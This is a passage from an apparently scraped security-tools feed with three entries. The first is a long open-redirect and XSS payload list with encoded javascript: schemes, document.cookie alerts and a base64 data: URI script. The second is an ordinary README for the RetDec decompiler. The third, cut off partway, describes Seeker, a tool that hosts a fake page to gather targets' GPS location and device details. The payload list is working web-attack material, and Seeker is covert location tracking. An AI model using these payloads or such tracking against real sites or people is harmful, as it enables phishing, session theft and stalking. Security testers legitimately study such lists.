http:[email\u00a0protected]\n http:XY>.7d8T\\[email\u00a0protected]\n \u3031google.com\n \u3035google.com\n \u309dgoogle.com\n \u30fcgoogle.com\n \uff70google.com\n /\u3031google.com\n /\u3035google.com\n /\u309dgoogle.com\n /\u30fcgoogle.com\n /\uff70google.com\n %68%74%74 %70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d\n http://%67%6f%6f%67%6c%65%2e%63%6f%6d\n <>javascript:alert(1);\n <>//google.com\n //google.com\\@example.com\n https://:@google.com\\@example.com\n \\x6A\\x61\\x76\\x61\\x73\\x63\\x72\\x69\\x70\\x74\\x3aalert(1)\n \\u006A\\u0061\\u0076\\u0061\\u0073\\u0063\\u0072\\u0069\\u0070\\u0074\\u003aalert(1)\n ja\\nva\\tscript\\r:alert(1)\n \\j\\av\\a\\s\\cr\\i\\pt\\:\\a\\l\\ert\\(1\\)\n \\152\\141\\166\\141\\163\\143\\162\\151\\160\\164\\072alert(1)\n http://google.com:80#@example.com/\n http://google.com:[email\u00a0protected]/\n http://[email\u00a0protected][email\u00a0protected]/\n http://XY>.7d8T\\[email\u00a0protected][email\u00a0protected]/\n http://[email\u00a0protected]@google.com/\n http://XY>.7d8T\\[email\u00a0protected]@google.com/\n http://example.com+&@google.com#[email\u00a0protected]/\n http://google.com\\texample.com/\n //google.com:80#@example.com/\n //google.com:[email\u00a0protected]/\n //[email\u00a0protected][email\u00a0protected]/\n //XY>.7d8T\\[email\u00a0protected] [email\u00a0protected]/\n //[email\u00a0protected]@google.com/\n //XY>.7d8T\\[email\u00a0protected]@google.com/\n //example.com+&@google.com#[email\u00a0protected]/\n //google.com\\texample.com/\n //;@google.com\n http://;@google.com\n @google.com\n javascript://https://example.com/?z=%0Aalert(1)\n data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4=\n http://google.com%2f%2f.example.com/\n http://google.com%5c%5c.example.com/\n http://google.com%3F.example.com/\n http://google.com%23.example.com/\n http://example.com:80%40google.com/\n http://example.com%2egoogle.com/\n /x:1/:///%01javascript:alert(document.cookie)/\n /https:/%5cgoogle.com/\n 
javascripT://anything%0D%0A%0D%0Awindow.alert(document.cookie)\n /http://google.com\n /%2f%2fgoogle.com\n /google.com/%2f%2e%2e\n /http:/google.com\n /.google.com\n ///\\;@google.com\n ///google.com\n /////google.com/\n\n \n** References : ** \n\n\n * [ CWE Entry 601 on Open Redirects. ](<https://cwe.mitre.org/data/definitions/601.html> \"CWE Entry 601 on Open Redirects.\" ) \n\n * [ WASC Article on URL Redirector Abuse ](<http://projects.webappsec.org/w/page/13246981/URL%20Redirector%20Abuse> \"WASC Article on URL Redirector Abuse\" ) \n\n * [ Google blog article on the dangers of open redirects. ](<https://googlewebmastercentral.blogspot.com/2009/01/open-redirect-urls-is-your-site-being.html> \"Google blog article on the dangers of open redirects.\" ) \n\n * [ Preventing Open Redirection Attacks (C#). ](<https://www.asp.net/mvc/tutorials/security/preventing-open-redirection-attacks> \"Preventing Open Redirection Attacks \\(C#\\).\" ) \n\n \n \n\n\n** [ Source Open-Redirect-Payload-List ](<https://github.com/payloadbox/open-redirect-payload-list> \"Download Open-Redirect-Payload-List\" ) **\n", "modified": "2019-12-07T11:00:01", "published": "2019-12-07T11:00:01", "id": "KITPLOIT:8925675766876700555", "href": "http://www.kitploit.com/2019/12/open-redirect-payload-list.html", "title": "Open Redirect Payload List", "type": "kitploit", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-12-06T23:29:36", "bulletinFamily": "tools", "description": "[  ](<https://1.bp.blogspot.com/-jzsREV3t4o4/XemVrhRII6I/AAAAAAAARBs/ilxOWXVRtkQaN43iYmDU7nEk_qgV_osLgCNcBGAsYHQ/s1600/retdec.png>)\n\n \n[ RetDec ](<https://retdec.com/> \"RetDec\" ) is a retargetable machine-code [ decompiler ](<https://www.kitploit.com/search/label/Decompiler> \"decompiler\" ) based on [ LLVM ](<https://llvm.org/> \"LLVM\" ) . 
\nThe decompiler is not limited to any particular target architecture, operating system, or executable file format: \n\n\n * Supported file formats: ELF, PE, Mach-O, COFF, AR (archive), Intel HEX, and raw machine code \n * Supported architectures: \n * 32-bit: Intel x86, ARM, MIPS, PIC32, and PowerPC \n * 64-bit: x86-64, ARM64 (AArch64) \nFeatures: \n\n\n * Static analysis of executable files with detailed information. \n * Compiler and packer detection. \n * Loading and instruction decoding. \n * Signature-based removal of statically linked library code. \n * Extraction and utilization of [ debugging ](<https://www.kitploit.com/search/label/Debugging> \"debugging\" ) information (DWARF, PDB). \n * Reconstruction of instruction idioms. \n * Detection and reconstruction of C++ class hierarchies (RTTI, vtables). \n * Demangling of symbols from C++ binaries (GCC, MSVC, Borland). \n * Reconstruction of functions, types, and high-level constructs. \n * Integrated disassembler. \n * Output in two high-level languages: C and a Python-like language. \n * Generation of call graphs, control-flow graphs, and various statistics. \nFor more information, check out our \n\n\n * [ Wiki ](<https://github.com/avast/retdec/wiki> \"Wiki\" ) (in progress) \n * Botconf 2017 talk: [ slides ](<https://retdec.com/static/publications/retdec-slides-botconf-2017.pdf> \"slides\" ) , [ video ](<https://www.youtube.com/watch?v=HHFvtt5b6yY> \"video\" )\n * REcon Montreal 2018 talk: [ slides ](<https://retdec.com/static/publications/retdec-slides-recon-2018.pdf> \"slides\" )\n * [ Publications ](<https://retdec.com/publications/> \"Publications\" )\n \n** Installation and Use ** \nCurrently, we support Windows (7 or later), Linux, macOS, and (experimentally) FreeBSD. An installed version of RetDec requires approximately 4 GB of free disk space. \n \n** Windows ** \n\n\n 1. 
Either download and unpack a [ pre-built package ](<https://github.com/avast/retdec/releases> \"pre-built package\" ) , or build and install the decompiler by yourself (the process is described below). \n\n 2. Install [ Microsoft Visual C++ Redistributable for Visual Studio 2015 ](<https://www.microsoft.com/en-us/download/details.aspx?id=48145> \"Microsoft Visual C++ Redistributable for Visual Studio 2015\" ) . \n\n 3. Install the following programs: \n\n * [ Python ](<https://www.python.org/> \"Python\" ) (version >= 3.4) \n * [ UPX ](<https://upx.github.io/> \"UPX\" ) (Optional: if you want to use UPX unpacker in the preprocessing stage) \n * [ Graphviz ](<https://graphviz.gitlab.io/_pages/Download/windows/graphviz-2.38.msi> \"Graphviz\" ) (Optional: if you want to generate call or control flow graphs) \n 4. Now, you are all set to run the decompiler. To decompile a binary file named ` test.exe ` , run the following command (ensure that ` python ` runs Python 3; as an alternative, you can try ` py -3 ` ) \n\n \n python $RETDEC_INSTALL_DIR/bin/retdec-decompiler.py test.exe\n\nFor more information, run ` retdec-decompiler.py ` with ` --help ` . \n\n \n** Linux ** \n\n\n 1. Either download and unpack a [ pre-built package ](<https://github.com/avast/retdec/releases> \"pre-built package\" ) , or build and install the decompiler by yourself (the process is described below). \n\n 2. After you have built the decompiler, you will need to install the following packages via your distribution's package manager: \n\n * [ Python ](<https://www.python.org/> \"Python\" ) (version >= 3.4) \n * [ UPX ](<https://upx.github.io/> \"UPX\" ) (Optional: if you want to use UPX unpacker in the preprocessing stage) \n * [ Graphviz ](<https://www.graphviz.org/> \"Graphviz\" ) (Optional: if you want to generate call or control flow graphs) \n 3. Now, you are all set to run the decompiler. 
To decompile a binary file named ` test.exe ` , run \n\n \n $RETDEC_INSTALL_DIR/bin/retdec-decompiler.py test.exe\n\nFor more information, run ` retdec-decompiler.py ` with ` --help ` . \n\n \n** macOS ** \n\n\n 1. Either download and unpack a [ pre-built package ](<https://github.com/avast/retdec/releases> \"pre-built package\" ) , or build and install the decompiler by yourself (the process is described below). \n\n 2. After you have built the decompiler, you will need to install the following packages: \n\n * [ Python ](<https://www.python.org/> \"Python\" ) (version >= 3.4) \n * [ UPX ](<https://upx.github.io/> \"UPX\" ) (Optional: if you want to use UPX unpacker in the preprocessing stage) \n * [ Graphviz ](<https://www.graphviz.org/> \"Graphviz\" ) (Optional: if you want to generate call or control flow graphs) \n 3. Now, you are all set to run the decompiler. To decompile a binary file named ` test.exe ` , run \n\n \n $RETDEC_INSTALL_DIR/bin/retdec-decompiler.py test.exe\n\nFor more information, run ` retdec-decompiler.py ` with ` --help ` . \n\n \n** FreeBSD (Experimental) ** \n\n\n 1. There are currently no pre-built \"ports\" packages for FreeBSD. You will have to build and install the decompiler by yourself. The process is described below. \n\n 2. After you have built the decompiler, you may need to install the following packages and execute the following command: \n\n \n sudo pkg install python37\n sudo ln -s /usr/local/bin/python3.7 /usr/local/bin/python3\n\n 3. Now, you are all set to run the decompiler. To decompile a binary file named ` test.exe ` , run \n\n \n $RETDEC_INSTALL_DIR/bin/retdec-decompiler.py test.exe\n\nFor more information, run ` retdec-decompiler.py ` with ` --help ` . \n\n \n** Build and Installation ** \nThis section describes a local build and installation of RetDec. Instructions for Docker are given in the next section. 
\n \n** Requirements ** \n \n** Linux ** \n\n\n * A C++ compiler and standard C++ library supporting C++14 (e.g. GCC >= 5) \n * [ CMake ](<https://cmake.org/> \"CMake\" ) (version >= 3.6) \n * [ Git ](<https://git-scm.com/> \"Git\" )\n * [ Perl ](<https://www.perl.org/> \"Perl\" )\n * [ Python ](<https://www.python.org/> \"Python\" ) (version >= 3.4) \n * [ Bison ](<https://www.gnu.org/software/bison/> \"Bison\" ) (version >= 3.0) \n * [ Flex ](<https://www.gnu.org/software/flex/> \"Flex\" ) (version >= 2.6) \n * [ autotools ](<https://en.wikipedia.org/wiki/GNU_Build_System> \"autotools\" ) ( [ autoconf ](<https://www.gnu.org/software/autoconf/autoconf.html> \"autoconf\" ) , [ automake ](<https://www.gnu.org/software/automake/> \"automake\" ) , and [ libtool ](<https://www.gnu.org/software/libtool/> \"libtool\" ) ) \n * [ pkg-config ](<https://www.freedesktop.org/wiki/Software/pkg-config/> \"pkg-config\" )\n * [ m4 ](<https://www.gnu.org/software/m4/m4.html> \"m4\" )\n * [ zlib ](<https://zlib.net/> \"zlib\" )\n * Optional: [ Doxygen ](<https://www.stack.nl/~dimitri/doxygen/> \"Doxygen\" ) and [ Graphviz ](<https://www.graphviz.org/> \"Graphviz\" ) for generating API documentation \nOn Debian-based distributions (e.g. Ubuntu), the required packages can be installed with ` apt-get ` : \n\n \n \n sudo apt-get install build-essential cmake git perl python3 bison flex libfl-dev autoconf automake libtool pkg-config m4 zlib1g-dev upx doxygen graphviz\n\nOn RPM-based distributions (e.g. 
Fedora), the required packages can be installed with ` dnf ` : \n\n \n \n sudo dnf install gcc gcc-c++ cmake make git perl python3 bison flex autoconf automake libtool pkg-config m4 zlib-devel upx doxygen graphviz\n\nOn Arch Linux, the required packages can be installed with ` pacman ` : \n\n \n \n sudo pacman --needed -S base-devel cmake git perl python3 bison flex autoconf automake libtool pkg-config m4 zlib upx doxygen graphviz\n\n \n** Windows ** \n\n\n * Microsoft Visual C++ (version >= Visual Studio 2015 Update 2) \n * [ CMake ](<https://cmake.org/> \"CMake\" ) (version >= 3.6) \n * [ Git ](<https://git-scm.com/> \"Git\" )\n * [ Flex + Bison ](<https://sourceforge.net/projects/winflexbison/files/win_flex_bison3-latest.zip/download> \"Flex + Bison\" ) ( [ mirror ](<https://github.com/avast/retdec-support/releases/download/2018-07-27/win_flex_bison3-latest.zip> \"mirror\" ) ) from the [ Win flex-bison project ](<https://sourceforge.net/projects/winflexbison/> \"Win flex-bison project\" ) . Add the extracted directory to the system ` Path ` ( [ HOWTO ](<https://www.computerhope.com/issues/ch000549.htm> \"HOWTO\" ) ). \n * [ Active Perl ](<https://www.activestate.com/activeperl> \"Active Perl\" ) . It needs to be the first Perl in ` PATH ` , or it has to be provided to CMake using ` CMAKE_PROGRAM_PATH ` variable, e.g. ` -DCMAKE_PROGRAM_PATH=/c/perl/bin ` . Does NOT work with Strawberry Perl or MSYS2 Perl (you would have to install a pre-built version of OpenSSL, see below). \n * Alternatively, you can install OpenSSL directly from [ here ](<https://slproweb.com/products/Win32OpenSSL.html> \"here\" ) . This means OpenSSL won't be built and you don't need to install any Perl. Do not install Light version of OpenSSL as they don't contain development files. 
\n * [ Python ](<https://www.python.org/> \"Python\" ) (version >= 3.4) \n * Optional: [ Doxygen ](<http://ftp.stack.nl/pub/users/dimitri/doxygen-1.8.13-setup.exe> \"Doxygen\" ) and [ Graphviz ](<https://graphviz.gitlab.io/_pages/Download/windows/graphviz-2.38.msi> \"Graphviz\" ) for generating API documentation \n \n** macOS ** \nPackages should be preferably installed via [ Homebrew ](<https://brew.sh/> \"Homebrew\" ) . \n\n\n * Full Xcode installation ( [ including command-line tools ](<https://github.com/frida/frida/issues/338#issuecomment-426777849> \"including command-line tools\" ) , see [ #425 ](<https://github.com/avast/retdec/issues/425> \"#425\" ) and [ #433 ](<https://github.com/avast/retdec/issues/433> \"#433\" ) ) \n * [ CMake ](<https://cmake.org/> \"CMake\" ) (version >= 3.6) \n * [ Git ](<https://git-scm.com/> \"Git\" )\n * [ Perl ](<https://www.perl.org/> \"Perl\" )\n * [ Python ](<https://www.python.org/> \"Python\" ) (version >= 3.4) \n * [ Bison ](<https://www.gnu.org/software/bison/> \"Bison\" ) (version >= 3.0) \n * [ Flex ](<https://www.gnu.org/software/flex/> \"Flex\" ) (version >= 2.6) \n * [ autotools ](<https://en.wikipedia.org/wiki/GNU_Build_System> \"autotools\" ) ( [ autoconf ](<https://www.gnu.org/software/autoconf/autoconf.html> \"autoconf\" ) , [ automake ](<https://www.gnu.org/software/automake/> \"automake\" ) , and [ libtool ](<https://www.gnu.org/software/libtool/> \"libtool\" ) ) \n * Optional: [ Doxygen ](<https://www.stack.nl/~dimitri/doxygen/> \"Doxygen\" ) and [ Graphviz ](<https://www.graphviz.org/> \"Graphviz\" ) for generating API documentation \n \n** FreeBSD (Experimental) ** \nPackages should be installed via FreeBSDs pre-compiled package repository using the ` pkg ` command or built from scratch using the ` ports ` database method. 
\n\n\n * Full \"pkg\" tool instructions: [ handbook pkg method ](<https://www.freebsd.org/doc/handbook/pkgng-intro.html> \"handbook pkg method\" )\n * ` pkg install cmake python37 bison git autotools ` OR \n * Full \"ports\" instructions: [ handbook ports method ](<https://www.freebsd.org/doc/handbook/ports-using.html> \"handbook ports method\" )\n * ` portsnap fetch `\n * ` portsnap extract `\n * For example, ` cmake ` would be \n * ` whereis cmake `\n * ` cd /usr/ports/devel/cmake `\n * ` make install clean `\n \n** Process ** \nNote: Although RetDec now supports a system-wide installation ( [ #94 ](<https://github.com/avast/retdec/issues/94> \"#94\" ) ), unless you use your distribution's package manager to install it, we recommend installing RetDec locally into a designated directory. The reason for this is that uninstallation will be easier as you will only need to remove a single directory. To perform a local installation, run ` cmake ` with the ` -DCMAKE_INSTALL_PREFIX=<path> ` parameter, where ` <path> ` is directory into which RetDec will be installed (e.g. ` $HOME/projects/retdec-install ` on Linux and macOS, and ` C:\\projects\\retdec-install ` on Windows). \n\n\n * Clone the repository: \n * ` git clone https://github.com/avast/retdec `\n * Linux: \n * ` cd retdec `\n * ` mkdir build && cd build `\n * ` cmake .. -DCMAKE_INSTALL_PREFIX=<path> `\n * ` make -jN ` ( ` N ` is the number of processes to use for parallel build, typically number of cores + 1 gives fastest compilation time) \n * ` make install `\n * Windows: \n * Open a command prompt (e.g. ` cmd.exe ` ) \n * ` cd retdec `\n * ` mkdir build && cd build `\n * ` cmake .. -DCMAKE_INSTALL_PREFIX=<path> -G<generator> `\n * ` cmake --build . --config Release -- -m `\n * ` cmake --build . 
--config Release --target install `\n * Alternatively, you can open ` retdec.sln ` generated by ` cmake ` in Visual Studio IDE \n * macOS: \n * ` cd retdec `\n * ` mkdir build && cd build `\n * # Apple ships old Flex & Bison, so Homebrew versions should be used.\n export CMAKE_INCLUDE_PATH=\"/usr/local/opt/flex/include\"\n export CMAKE_LIBRARY_PATH=\"/usr/local/opt/flex/lib;/usr/local/opt/bison/lib\"\n export PATH=\"/usr/local/opt/flex/bin:/usr/local/opt/bison/bin:$PATH\"\n\n * ` cmake .. -DCMAKE_INSTALL_PREFIX=<path> `\n * ` make -jN ` ( ` N ` is the number of processes to use for parallel build, typically number of cores + 1 gives fastest compilation time) \n * ` make install `\n * FreeBSD: \n * ` sudo pkg install git cmake `\n * ` git clone https://github.com/avast/retdec `\n * ` cd retdec `\n * ` mkdir build && cd build `\n * # FreeBSD (and other BSDs) do need cmake, python3, bison, git, autotools. Flex and perl are pre-installed in the OS but check versions.\n # Later versions may be available for each of the packages.\n # See what is installed:\n sudo pkg info cmake python37 bison autotools\n # Install/upgrade them:\n sudo pkg install cmake python37 bison autotools\n\n * ` cmake .. -DCMAKE_INSTALL_PREFIX=<path> `\n * ` make -jN ` ( ` N ` is the number of processes to use for parallel build, typically number of cores + 1 gives fastest compilation time) \n * ` make install `\nYou have to pass the following parameters to ` cmake ` : \n\n\n * ` -DCMAKE_INSTALL_PREFIX=<path> ` to set the installation path to ` <path> ` . Quote the path if you are using backslashes on Windows (e.g. ` -DCMAKE_INSTALL_PREFIX=\"C:\\retdec\" ` ). \n * (Windows only) ` -G<generator> ` is ` -G\"Visual Studio 14 2015\" ` for 32-bit build using Visual Studio 2015, or ` -G\"Visual Studio 14 2015 Win64\" ` for 64-bit build using Visual Studio 2015. Later versions of Visual Studio may be used. 
\nYou can pass the following additional parameters to ` cmake ` : \n\n\n * ` -DRETDEC_DOC=ON ` to build with API documentation (requires Doxygen and Graphviz, disabled by default). \n * ` -DRETDEC_TESTS=ON ` to build with tests (disabled by default). \n * ` -DRETDEC_DEV_TOOLS=ON ` to build with development tools (disabled by default). \n * ` -DRETDEC_FORCE_OPENSSL_BUILD=ON ` to force OpenSSL build even if it is installed in the system (disabled by default). \n * ` -DRETDEC_COMPILE_YARA=OFF ` to disable YARA rules compilation at installation step (enabled by default). \n * ` -DCMAKE_BUILD_TYPE=Debug ` to build with debugging information, which is useful during development. By default, the project is built in the ` Release ` mode. This has no effect on Windows, but the same thing can be achieved by running ` cmake --build . ` with the ` --config Debug ` parameter. \n * ` -DCMAKE_PROGRAM_PATH=<path> ` to use Perl at ` <path> ` (probably useful only on Windows). \n * ` -D<dep>_LOCAL_DIR=<path> ` where ` <dep> ` is from ` {CAPSTONE, ELFIO, GOOGLETEST, JSONCPP, KEYSTONE, LIBDWARF, LLVM, PELIB, RAPIDJSON, TINYXML, YARACPP, YARAMOD} ` (e.g. ` -DCAPSTONE_LOCAL_DIR=<path> ` ), to use the local repository clone at ` <path> ` for RetDec dependency instead of downloading a fresh copy at build time. Multiple such options may be used at the same time. \n * ` -DRETDEC_ENABLE_<component>=ON ` to build only the specified component(s) (multiple such options can be used at once), and its (theirs) dependencies. By default, all the components are built. If at least one component is enabled via this mechanism, all the other components that were not explicitly enabled (and are not needed as dependencies of enabled components) are not built. See [ cmake/options.cmake ](<https://github.com/avast/retdec/blob/master/cmake/options.cmake> \"cmake/options.cmake\" ) for all the available component options. \n * ` -DRETDEC_ENABLE_ALL=ON ` can be used to (re-)enable all the components. 
\n * Alternatively, ` -DRETDEC_ENABLE=<comma-separated component list> ` can be used instead of ` -DRETDEC_ENABLE_<component>=ON ` (e.g. ` -DRETDEC_ENABLE=fileformat,loader,ctypesparser ` is equivalent to ` -DRETDEC_ENABLE_FILEFORMAT=ON -DRETDEC_ENABLE_LOADER=ON -DRETDEC_ENABLE_CTYPESPARSER=ON ` ). \n \n** Build in Docker ** \nDocker support is maintained by the community. If something does not work for you or if you have suggestions for improvements, open an issue or PR. \n \n** Build Image ** \nBuilding in Docker does not require installation of the required libraries locally. This is a good option for trying out RetDec without setting up the whole build toolchain. \nTo build the RetDec Docker image, run \n\n \n \n docker build -t retdec - < Dockerfile\n\nThis builds the image from the master branch of this repository. \nTo build the image using the local copy of the repository, use the development Dockerfile, ` Dockerfile.dev ` : \n\n \n \n docker build -t retdec:dev . -f Dockerfile.dev\n\n \n** Run Container ** \nIf your ` uid ` is not 1000, make sure that the directory containing your input binary files is accessible for RetDec: \n\n \n \n chmod 0777 /path/to/local/directory\n\nNow, you can run the decompiler inside a container: \n\n \n \n docker run --rm -v /path/to/local/directory:/destination retdec retdec-decompiler.py /destination/binary\n\nNote: Do not modify the ` /destination ` part. You only need to change ` /path/to/local/directory ` . Output files will then be generated in ` /path/to/local/directory ` . \n \n** Automated TeamCity Builds ** \nOur TeamCity servers are continuously generating [ up-to-date ](<https://www.kitploit.com/search/label/Up-to-date> \"up-to-date\" ) RetDec packages from the latest commit in the ` master ` branch. These are mostly meant to be used by RetDec developers, contributors, and other people experimenting with the product (e.g. testing if an issue present in the official release still exists in the current ` master ` ). 
\nYou can use these as you wish, but keep in mind that there are no guarantees they will work on your system (especially the Linux version), and that regressions are a possibility. To get a stable RetDec version, either download the latest official pre-built package or build the latest RetDec version tag. \n\n\n * [ Windows Server 2016, version 10.0 ](<https://retdec-tc.avast.com/repository/download/Retdec_WinBuild/.lastSuccessful/package/retdec-master-windows-64b.zip?guest=1> \"Windows Server 2016, version 10.0\" )\n * [ Ubuntu Bionic Linux, version 18.04 ](<https://retdec-tc.avast.com/repository/download/RetDec_LinuxBuild/.lastSuccessful/package/retdec-master-linux-64b.zip?guest=1> \"Ubuntu Bionic Linux, version 18.04\" )\n * [ Mac OS X, version 10.13.4 ](<https://retdec-tc.avast.com/repository/download/Retdec_MacBuild/.lastSuccessful/package/retdec-master-macos-64b.zip?guest=1> \"Mac OS X, version 10.13.4\" )\n \n** Repository Overview ** \nThis repository contains the following libraries: \n\n\n * ` ar-extractor ` \\- library for extracting object files from archives (based on LLVM). \n * ` bin2llvmir ` \\- library of LLVM passes for translating binaries into LLVM IR modules. \n * ` capstone2llvmir ` \\- binary instructions to LLVM IR translation library. \n * ` config ` \\- library for representing and managing RetDec configuration databases. \n * ` cpdetect ` \\- library for compiler and packer detection in binaries. \n * ` crypto ` \\- collection of cryptographic functions. \n * ` ctypes ` \\- C++ library for representing C function data types. \n * ` debugformat ` \\- library for uniform representation of DWARF and PDB debugging information. \n * ` demangler ` \\- demangling library capable to handle names generated by the GCC/Clang, Microsoft Visual C++, and Borland C++ compilers. \n * ` dwarfparser ` \\- library for high-level representation of DWARF debugging information. 
\n * ` fileformat ` \\- library for parsing and uniform representation of various object file formats. Currently supporting the following formats: COFF, ELF, Intel HEX, Mach-O, PE, raw data. \n * ` llvm-support ` \\- set of LLVM related utility functions. \n * ` llvmir-emul ` \\- LLVM IR emulation library used for unit testing. \n * ` llvmir2hll ` \\- library for translating LLVM IR modules to high-level source codes (C, Python-like language). \n * ` loader ` \\- library for uniform representation of binaries loaded to memory. Supports the same formats as fileformat. \n * ` macho-extractor ` \\- library for extracting regular Mach-O binaries from fat Mach-O binaries (based on LLVM). \n * ` patterngen ` \\- binary pattern extractor library. \n * ` pdbparser ` \\- Microsoft PDB files parser library. \n * ` stacofin ` \\- static code finder library. \n * ` unpacker ` \\- collection of unpacking functions. \n * ` utils ` \\- general C++ utility library. \nThis repository contains the following tools: \n\n\n * ` ar-extractortool ` \\- frontend for the ar-extractor library (installed as ` retdec-ar-extractor ` ). \n * ` bin2llvmirtool ` \\- frontend for the ` bin2llvmir ` library (installed as ` retdec-bin2llvmir ` ). \n * ` bin2pat ` \\- tool for generating patterns from binaries (installed as ` retdec-bin2pat ` ). \n * ` capstone2llvmirtool ` \\- frontend for the ` capstone2llvmir ` library (installed as ` retdec-capstone2llvmir ` ). \n * ` configtool ` \\- frontend for the ` config ` library (installed as ` retdec-config ` ). \n * ` ctypesparser ` \\- C++ library for parsing C function data types from JSON files into ` ctypes ` representation (installed as ` retdec-ctypesparser ` ). \n * ` demangler_grammar_gen ` \\-- tool for generating new grammars for the ` demangler ` library (installed as ` retdec-demangler-grammar-gen ` ). \n * ` demanglertool ` \\-- frontend for the ` demangler ` library (installed as ` retdec-demangler ` ). 
\n * ` fileinfo ` \\- [ binary analysis ](<https://www.kitploit.com/search/label/Binary%20Analysis> \"binary analysis\" ) tool. Supports the same formats as ` fileformat ` (installed as ` retdec-fileinfo ` ). \n * ` idr2pat ` \\- tool for extracting patterns from IDR knowledge bases (installed as ` retdec-idr2pat ` ). \n * ` llvmir2hlltool ` \\- frontend for the ` llvmir2hll ` library (installed as ` retdec-llvmir2hll ` ). \n * ` macho-extractortool ` \\- frontend for the ` macho-extractor ` library (installed as ` retdec-macho-extractor ` ). \n * ` pat2yara ` \\- tool for processing patterns to YARA signatures (installed as ` retdec-pat2yara ` ). \n * ` stacofintool ` \\- frontend for the ` stacofin ` library (installed as ` retdec-stacofin ` ). \n * ` unpackertool ` \\- plugin-based unpacker (installed as ` retdec-unpacker ` ). \nThis repository contains the following scripts: \n\n\n * ` retdec-decompiler.py ` \\- the main decompilation script binding it all together. This is the tool to use for full binary-to-C decompilations. \n * Support scripts used by ` retdec-decompiler.py ` : \n * ` retdec-color-c.py ` \\- decorates output C sources with IDA color tags - syntax highlighting for IDA. \n * ` retdec-config.py ` \\- decompiler's configuration file. \n * ` retdec-archive-decompiler.py ` \\- decompiles objects in the given AR archive. \n * ` retdec-fileinfo.py ` \\- a Fileinfo tool wrapper. \n * ` retdec-signature-from-library-creator.py ` \\- extracts function signatures from the given library. \n * ` retdec-unpacker.py ` \\- tries to unpack the given executable file by using any of the supported unpackers. \n * ` retdec-utils.py ` \\- a collection of Python utilities. \n * ` retdec-tests-runner.py ` \\- run all tests in the unit test directory. 
\n * ` type_extractor ` \\- generation of type information (for internal use only) \n \n** Project Documentation ** \nSee the [ project documentation ](<https://retdec-tc.avast.com/repository/download/Retdec_DoxygenBuild/.lastSuccessful/build/doc/doxygen/html/index.html?guest=1> \"project documentation\" ) for an up to date Doxygen-generated software reference corresponding to the latest commit in the ` master ` branch. \n \n** Related Repositories ** \n\n\n * [ retdec-idaplugin ](<https://github.com/avast/retdec-idaplugin> \"retdec-idaplugin\" ) \\-- Embeds RetDec into IDA (Interactive Disassembler) and makes its use much easier. \n * [ retdec-regression-tests-framework ](<https://github.com/avast/retdec-regression-tests-framework> \"retdec-regression-tests-framework\" ) \\-- A framework for writing and running regression tests for RetDec and related tools. This is a must if you plan to contribute to the RetDec project. \n * [ retdec-regression-tests ](<https://github.com/avast/retdec-regression-tests> \"retdec-regression-tests\" ) \\-- A suite of regression tests for RetDec and related tools. \n * [ vim-syntax-retdecdsm ](<https://github.com/s3rvac/vim-syntax-retdecdsm> \"vim-syntax-retdecdsm\" ) \\-- Vim syntax-highlighting file for the output from the RetDec's [ disassembler ](<https://www.kitploit.com/search/label/Disassembler> \"disassembler\" ) ( ` .dsm ` files). \n \n** License ** \nCopyright (c) 2017 Avast Software, licensed under the MIT license. See the [ ` LICENSE ` ](<https://github.com/avast/retdec/blob/master/LICENSE> \"RetDec is a retargetable machine-code decompiler based on LLVM. \\(83\\)\" ) file for more details. \nRetDec uses third-party libraries or other resources listed, along with their licenses, in the [ ` LICENSE-THIRD-PARTY ` ](<https://github.com/avast/retdec/blob/master/LICENSE-THIRD-PARTY> \"RetDec is a retargetable machine-code decompiler based on LLVM. \\(84\\)\" ) file. 
\n \n** Contributing ** \nSee [ RetDec contribution guidelines ](<https://github.com/avast/retdec/wiki/Contribution-Guidelines> \"RetDec contribution guidelines\" ) . \n \n** Acknowledgements ** \nThis software was supported by the research funding TACR (Technology Agency of the Czech Republic), ALFA Programme No. TA01010667. \n \n \n\n\n** [ Download Retdec ](<https://github.com/avast/retdec> \"Download Retdec\" ) **\n", "modified": "2019-12-06T19:50:05", "published": "2019-12-06T19:50:05", "id": "KITPLOIT:2088998605550034810", "href": "http://www.kitploit.com/2019/12/retdec-retargetable-machine-code.html", "title": "RetDec - A Retargetable Machine-Code Decompiler Based On LLVM", "type": "kitploit", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-12-06T15:28:32", "bulletinFamily": "tools", "description": "[  ](<https://1.bp.blogspot.com/-13mDu2RJfxQ/XemUDd7b0VI/AAAAAAAARBc/cJ3brE37QJQRcm8JuQx39JorrImbB_rAwCNcBGAsYHQ/s1600/seeker_1.png>)\n\n \n\n\nConcept behind Seeker is simple, just like we host phishing pages to get [ credentials ](<https://www.kitploit.com/search/label/Credentials> \"credentials\" ) why not host a fake page that requests your location like many popular location based websites. 
Read more on [ thewhiteh4t's Blog ](<https://thewhiteh4t.github.io/> \" thewhiteh4t's Blog \" ) . Seeker hosts a fake website on ** In Built PHP Server ** and uses ** Serveo ** to generate a link which we will forward to the target, website asks for Location Permission and if the target allows it, we can get : \n\n\n * Longitude \n * Latitude \n * Accuracy \n * Altitude - Not always available \n * Direction - Only available if user is moving \n * Speed - Only available if user is moving \nAlong with Location Information we also get ** Device Information ** without any permissions : \n\n\n * Operating System \n * Platform \n * Number of CPU Cores \n * Amount of RAM - Approximate Results \n * Screen Resolution \n * GPU information \n * Browser Name and Version \n * Public IP Address \n * IP Address Reconnaissance \n** This tool is a Proof of Concept and is for Educational Purposes Only, Seeker shows what data a malicious website can gather about you and your devices and why you should not click on random links and allow critical permissions such as Location etc. ** \n \n** How is this Different from IP GeoLocation ** \n\n\n * Other tools and services offer IP [ Geolocation ](<https://www.kitploit.com/search/label/Geolocation> \"Geolocation\" ) which is NOT accurate at all and does not give the location of the target; instead it is the approximate location of the ISP. \n\n * Seeker uses HTML API and gets Location Permission and then grabs [ Longitude ](<https://www.kitploit.com/search/label/Longitude> \"Longitude\" ) and Latitude using GPS Hardware which is present in the device, so Seeker works best with Smartphones; if the GPS Hardware is not present, such as on a Laptop, Seeker falls back to IP Geolocation or it will look for Cached Coordinates. \n\n * Generally, if a user accepts the location permission, the information received is ** accurate to approximately 30 meters ** ; accuracy depends on the device. 
